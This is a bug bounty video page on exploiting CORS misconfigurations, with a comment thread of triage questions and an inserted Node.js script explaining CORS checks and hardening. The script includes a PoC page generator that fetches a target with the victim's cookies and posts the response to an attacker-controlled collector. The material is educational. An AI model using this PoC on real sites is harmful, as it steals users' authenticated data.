
Cors misconfiguration | leads to sensitive information | Bug bounty poc

  • Published: Nov 5, 2023
  • In this video I am going to show you a CORS vulnerability PoC: how you can exploit it and report it.
    This video is for education purposes only.
    #hackerone #bugbounty
    Disclaimer: This video is strictly for educational and informational purposes only. I own all equipment used for this demonstration. Hacking without permission is illegal, so always ensure you have proper authorization before using security tools in any network environment. Thanks.

Comments • 42

  • @zedvn3792
    @zedvn3792 2 months ago +1

    What tool do you use to find that endpoint?
    Can you share it with me?
    Thanks a lot

    • @lostsecc
      @lostsecc  2 months ago +1

      gau or katana

  • @Sakuraigi
    @Sakuraigi 1 month ago

    Hey bro, I discovered a CORS misconfiguration in a subdomain which has ACAO set to a subdomain of that subdomain and ACAC set to true. However, I can't provide a PoC because the subdomain has only a search function that seems to be immune to XSS and a login form. Registration in this sub is suspended to ensure quality, so they aren't receiving new partners. Even if it were open, I think I wouldn't be able to register with them as they have many eligibility requirements! So what should I do? If I report, will I get a bounty or will it be wasted?

    • @lostsecc
      @lostsecc  1 month ago

      CORS is only effective on sensitive endpoints that are not publicly exposed

  • @abhishekkumar_981
    @abhishekkumar_981 9 months ago +1

    Well done

  • @thechannelofmine
    @thechannelofmine 4 months ago

    I found the same bug today at the same endpoint /wp-json/wp/v2/users, but the question is: is it accepted as an information disclosure vulnerability?

    • @lostsecc
      @lostsecc  4 months ago

      If this information is public then they mark it as informative, but some programs take it seriously.

    • @thechannelofmine
      @thechannelofmine 4 months ago

      @@lostsecc can we talk somewhere else in private? I have an additional note

    • @thechannelofmine
      @thechannelofmine 4 months ago

      @@lostsecc if we try to get the cookie directly we get: `Refused to get unsafe header "Set-Cookie"`. I think it's because of the HttpOnly policy. Is this bug still valid? Can the attacker use an https website to bypass the policy?

    • @lostsecc
      @lostsecc  4 months ago

      No, if it's HttpOnly and the Secure flag is set, it's not impactful

  • @b4arabe132
    @b4arabe132 3 months ago

    Thanks for the video, brother. Brother, I hope you answer me. I found the same bug and used the same PoC, and I got the content of the URL returned by sending that request, and everything, but the vulnerable URL is like an API that contains some info that's not important, you can say. But CORS worked, the PoC returned content. Should I report it or not?

    • @lostsecc
      @lostsecc  3 months ago

      They mark it as informative if the endpoint or info is not sensitive

    • @b4arabe132
      @b4arabe132 3 months ago

      @@lostsecc thank you bro

  • @brahmareddy5763
    @brahmareddy5763 2 months ago

    Finding CORS is ok. But the CORS.html file, what does it fetch from the target, bro?

    • @lostsecc
      @lostsecc  2 months ago

      the response that you get in Burp Suite

  • @H4cker_Nafeed
    @H4cker_Nafeed 4 months ago

    Does CORS work only where there is no HttpOnly on the cookies?

    • @lostsecc
      @lostsecc  4 months ago +1

      No, that is for protecting against XSS cookie stealing.

    • @H4cker_Nafeed
      @H4cker_Nafeed 4 months ago

      @@lostsecc then how does CORS work?
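
The threads above ask what the CORS.html PoC actually fetches, how the browser decides whether the attacker's page may read the response, why `Set-Cookie` is never readable from script, and when a reflected origin is reportable rather than informative. The Node.js script below is an added example, not code from the video or from any tool it mentions; every origin, URL, header and response in it is constructed for illustration, and `attacker.example`, `app.example` and `collector` are assumed names.

```javascript
// Added example (not from the video): the pieces of a CORS misconfiguration PoC, modelled offline.
// All origins, URLs and headers are constructed for illustration.

// 1. Vulnerable server: reflects whatever Origin it receives and allows credentials.
function vulnerableCorsHeaders(requestOrigin) {
  return {
    "access-control-allow-origin": requestOrigin,
    "access-control-allow-credentials": "true",
  };
}

// 2. Hardened server: exact-match allowlist (no regex, no endsWith); unknown origins get no
//    CORS headers at all. Vary: Origin stops a cached allow-header leaking to another origin.
function hardenedCorsHeaders(requestOrigin, allowlist) {
  if (!allowlist.includes(requestOrigin)) return {};
  return {
    "access-control-allow-origin": requestOrigin,
    "access-control-allow-credentials": "true",
    "vary": "Origin",
  };
}

// 3. The browser-side check a credentialed fetch() from the attacker's page must pass:
//    ACAO must equal the attacker origin exactly ("*" is rejected when credentials are sent)
//    and ACAC must be the literal string "true". HttpOnly does not enter into this check: the
//    browser attaches the cookie itself, so script never needs to read it.
function browserAllowsCredentialedRead(attackerOrigin, responseHeaders) {
  const acao = responseHeaders["access-control-allow-origin"];
  const acac = responseHeaders["access-control-allow-credentials"];
  return acao === attackerOrigin && acac === "true";
}

// 4. Which response headers script can read after a successful CORS check: the safelisted
//    set plus anything named in Access-Control-Expose-Headers. Set-Cookie is a forbidden
//    response-header name and is never exposed, which is the "Refused to get unsafe header"
//    message from the thread. The body is still fully readable; only the header is hidden.
const SAFELISTED = new Set(["cache-control", "content-language", "content-length",
  "content-type", "expires", "last-modified", "pragma"]);
const FORBIDDEN = new Set(["set-cookie", "set-cookie2"]);
function scriptReadableHeaders(responseHeaders) {
  const exposed = (responseHeaders["access-control-expose-headers"] || "")
    .split(",").map((h) => h.trim().toLowerCase()).filter(Boolean);
  return Object.keys(responseHeaders).filter((name) => {
    const n = name.toLowerCase();
    if (FORBIDDEN.has(n)) return false;
    return SAFELISTED.has(n) || exposed.includes(n);
  });
}

// 5. Triage rule the replies keep repeating: a reflected origin only matters when the body
//    contains something the attacker could not fetch without the victim's session.
function triage(attackerOrigin, responseHeaders, bodyRequiresAuth) {
  if (!browserAllowsCredentialedRead(attackerOrigin, responseHeaders)) return "not exploitable";
  return bodyRequiresAuth ? "exploitable: report with PoC" : "informative: data is public anyway";
}

// 6. The PoC page itself (what CORS.html does): fetch the target with the victim's cookies
//    and post the body to a collector the tester controls (assumed URL).
function buildPocHtml(targetUrl, collectorUrl) {
  return `<!doctype html>
<script>
fetch(${JSON.stringify(targetUrl)}, { credentials: "include" })
  .then((r) => r.text())
  .then((body) => fetch(${JSON.stringify(collectorUrl)}, { method: "POST", body }));
</script>`;
}

// Constructed demo: the attacker origin against a reflecting endpoint and a hardened one.
const ATTACKER = "https://attacker.example";
const SITE_ALLOWLIST = ["https://app.example", "https://admin.example"];

function demo() {
  const vuln = vulnerableCorsHeaders(ATTACKER);
  const hard = hardenedCorsHeaders(ATTACKER, SITE_ALLOWLIST);
  return {
    authenticatedEndpoint: triage(ATTACKER, vuln, true),   // "exploitable: report with PoC"
    publicEndpoint: triage(ATTACKER, vuln, false),         // "informative: data is public anyway"
    hardenedEndpoint: triage(ATTACKER, hard, true),        // "not exploitable"
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

Run it with `node cors_check.js`. The `demo()` result is the decision the replies describe: reflected origin plus credentials on an endpoint that only returns data for a logged-in user is reportable with the PoC page; the same headers on data anyone can fetch (the `/wp-json/wp/v2/users` case) is informative. Note that the vulnerable pattern needs the origin reflected exactly: a server that answers `Access-Control-Allow-Origin: *` with credentials enabled is still blocked by the browser, so check the headers in Burp before writing the PoC.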

  • @ayoubelgana4581
    @ayoubelgana4581 9 months ago

    Impact?

    • @lostsecc
      @lostsecc  9 months ago +1

      Attackers can use CORS vulnerabilities to steal sensitive data from applications like API keys, SSH keys, personally identifiable information (PII), or users' credentials.

    • @ayoubelgana4581
      @ayoubelgana4581 9 months ago

      @@lostsecc really? Because I sent a report to Bugcrowd about the same vulnerability, but they classified it as not applicable

    • @ayoubelgana4581
      @ayoubelgana4581 9 months ago

      @@lostsecc do you have discord?

    • @lostsecc
      @lostsecc  9 months ago +1

      It depends on the impact. This information is publicly available, so they mark it as informative. Better to look for a sensitive endpoint.

    • @ayoubelgana4581
      @ayoubelgana4581 9 months ago +2

      @@lostsecc Please, do you have discord so I can contact you?

  • @CywerLearning
    @CywerLearning 6 months ago

    Send the code??

    • @lostsecc
      @lostsecc  6 months ago

      search for coffinxp on GitHub

    • @CywerLearning
      @CywerLearning 5 months ago

      @@lostsecc not found, can you send it?? Please, in a drive folder

    • @vikas340
      @vikas340 5 months ago

      @@lostsecc please send

    • @vikas340
      @vikas340 5 months ago

      @@lostsecc please put the code for download in a drive folder

    • @lostsecc
      @lostsecc  5 months ago

      I will send it on Telegram @lostsec soon